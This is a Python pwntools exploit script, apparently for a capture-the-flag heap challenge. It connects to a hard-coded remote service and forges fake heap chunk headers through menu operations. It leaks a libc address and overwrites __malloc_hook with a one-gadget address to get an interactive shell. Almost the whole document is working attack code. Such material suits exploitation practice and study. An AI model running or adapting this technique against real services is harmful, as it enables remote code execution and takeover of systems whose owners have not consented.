#!/usr/bin/env python3
from pwn import *
# Terminal command pwntools uses when it needs to open a split window
# (e.g. for an attached debugger); this script itself never attaches one.
context.terminal = ["tmux", "sp", "-h"]
# context.log_level = "debug"  # uncomment to trace every byte sent/received
# Challenge binary and the libc shipped with it, loaded for symbol lookup;
# checksec output is suppressed to keep the console quiet.
chall, libc = (ELF(path, checksec=False) for path in ("./chall", "./libc.so.6"))
def alloc(idx, size):
    """Drive menu option 1 on the module-level ``io`` tube.

    Sends "1" at the "Choice:" prompt, then *idx* and *size* (as decimal
    strings) at the "Index:" and "Size:" prompts, in that order.
    """
    replies = (("Choice:", "1"), ("Index:", str(idx)), ("Size:", str(size)))
    for prompt, answer in replies:
        io.sendlineafter(prompt, answer)
def edit(idx, data):
    """Drive menu option 2 on the module-level ``io`` tube.

    Sends "2" at "Choice:", *idx* at "Index:", then *data* at "Data:".
    The payload goes through ``sendafter`` (not ``sendlineafter``), so no
    newline is appended to it - callers pass exact binary content.
    """
    slot = str(idx)
    io.sendlineafter("Choice:", "2")
    io.sendlineafter("Index:", slot)
    io.sendafter("Data:", data)
def show(idx):
    """Drive menu option 4 on the module-level ``io`` tube.

    Sends "4" at "Choice:" and *idx* at "Index:"; whatever the service prints
    in response is left in the tube for the caller to read.
    """
    replies = (("Choice:", "4"), ("Index:", str(idx)))
    for prompt, answer in replies:
        io.sendlineafter(prompt, answer)
def copy(frm, to):
    """Drive menu option 3 on the module-level ``io`` tube.

    Sends "3" at "Choice:", then *frm* at "From:" and *to* at "To:" as
    decimal strings.
    """
    replies = (("Choice:", "3"), ("From:", str(frm)), ("To:", str(to)))
    for prompt, answer in replies:
        io.sendlineafter(prompt, answer)
def delete(idx):
    """Drive menu option 5 on the module-level ``io`` tube.

    Sends "5" at "Choice:" and *idx* at "Index:". Defined for completeness;
    the script body below never calls it.
    """
    replies = (("Choice:", "5"), ("Index:", str(idx)))
    for prompt, answer in replies:
        io.sendlineafter(prompt, answer)
# Hard-coded remote target; there is no local process("./chall") fallback, so
# the ELF loaded above only serves symbol lookup.
io = remote("69.90.132.248", 1337)

# --- Setup: allocate slots 0-2 and 4, copy/edit them, and plant size bytes. ---
alloc(0, 0x90)
copy(0, 0)
edit(0, "A" * 8)
copy(0, 0)
alloc(1, 0x90)
alloc(2, 0x90)
copy(2, 3)
edit(1, p8(0) * 0x0 + p64(0x51))  # p8(0) * 0x0 is empty; the write is just p64(0x51)
alloc(0, 0x40)
alloc(4, 0x40)
edit(2, p8(0) * 0x8f + p8(0xf1))  # single byte 0xf1 at offset 0x8f of slot 2
alloc(0, 0xe0)

# Fake chunk header: a 0xf1 size field followed by 0x1 and 0 in the next two
# qwords. It is written at offset 0x38 of slot 0 before each copy(4, 4).
fake_chunk = p64(0) + p64(0xf1)
fake_chunk += p64(0x1) + p64(0)
# NOTE(review): indentation was lost in this listing; the loop body is taken
# to be the edit/copy pair, with the alloc below running once after the loop
# - confirm against the original file.
for _ in range(7):
    edit(0, p8(0) * 0x38 + fake_chunk)
    copy(4, 4)
alloc(1, 0xf0) # Fix next chunk
edit(1, p8(0) * 0x90 + p64(0x61))  # size field 0x61 at offset 0x90 of slot 1
edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)

# --- Leak: fill slot 0 with a 0x48-byte marker, print it, then decode the
# bytes that follow the marker (up to the newline) as a little-endian qword. ---
edit(0, "A" * 0x48)
show(0)
io.recvuntil("A" * 0x48)
leaked_libc = u64(io.recvuntil("\n", drop = True).ljust(8, b"\x00"))
# 0x1ebbe1 is the leaked value's offset inside the shipped ./libc.so.6 and is
# tied to that exact build. Nothing validates the result (e.g. page alignment
# of libc.address) before it is used below, so a wrong build fails silently.
libc.address = leaked_libc - 0x1ebbe1
log.success("Leaked GLIBC address: " + hex(leaked_libc))
log.info("GLIBC base address: " + hex(libc.address))

# --- Same write-then-copy pattern as above, now with a 0x51 size field. ---
fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x1) + p64(0)
edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)
fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x1) + p64(0)
edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)
# Third qword of the fake chunk is now __malloc_hook - 8 (libc-relative).
fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(libc.sym["__malloc_hook"] - 0x8) + p64(0)
edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)
alloc(1, 0x40)
# Once more with 0x2 in the third qword, then allocate slot 2 and write a
# libc-relative value into it. 0xe6c7e is likewise specific to the shipped
# libc build - TODO confirm when the libc changes.
fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x2) + p64(0)
edit(0, p8(0) * 0x38 + fake_chunk)
alloc(2, 0x40)
edit(2, p64(libc.address + 0xe6c7e))
# Final zero-size allocation; presumably this is what makes the service call
# malloc with the modified hook in place - confirm.
alloc(1, 0)
io.interactive()
io.close()